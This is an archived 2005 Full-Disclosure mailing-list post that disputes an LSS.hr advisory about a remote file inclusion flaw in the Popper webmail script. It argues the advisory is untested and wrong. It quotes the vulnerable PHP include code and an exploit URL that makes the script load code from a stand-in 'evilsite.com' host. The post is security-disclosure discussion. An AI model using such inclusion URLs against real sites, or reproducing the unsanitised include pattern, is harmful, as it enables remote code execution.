|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] LSS.hr false positives.
From: b0iler (b0iler
r00thell.org)
Date: Sat Jun 04 2005 - 16:15:26 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
>From your advisory http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-07:
>Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script that can be
>abused to execute arbitrary code.
>Vulnerable code in childwindow.inc.php:
>
>-----
>...
> if(file_exists($form.".toolbar.inc.php")) {
> include($form.".toolbar.inc.php");
> }
>?>
file_exists() only work on local files, not even with allow_url_fopen on does it work. Even
if the file_exists() check was not there your discription of how to exploit it is incorrect:
>To exploit this vulnerability, attacker has to put script like test.form.inc.php on
>www.evilsite.com HTTP server, and call url like this:
>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
they would need to have the file test.toolbar.inc.php, not test.form.inc.php. It's quite
obvious you did not even bother testing this before issuing the advisory.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]